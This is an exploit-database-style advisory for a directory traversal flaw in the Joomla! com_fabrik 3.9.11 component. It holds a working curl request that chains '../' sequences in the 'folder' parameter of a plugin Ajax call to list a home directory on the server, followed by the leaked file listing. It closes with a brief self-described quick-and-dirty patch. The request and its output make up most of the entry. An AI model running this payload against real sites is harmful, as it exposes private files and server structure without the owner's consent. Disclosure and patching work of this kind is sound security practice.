Exploits / Vulnerability Discovered : 2020-03-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Joomla! com_fabrik 3.9.11 directory traversal is for educational purposes only and if it is used you will do on your own risk!
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"
...snip...
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
...snip...
##################################################################
#Q&D Patch (DO NOT USE :3)
##################################################################
--- ./image.php ---
+++ image_patched.php ---
@@ -394,7 +394,7 @@
public function onAjax_files()
{
$this->loadMeForAjax();
- $folder = $this->app->input->get('folder', '', 'string');
+ $folder = $this->app->input->get('folder', '', 'cmd');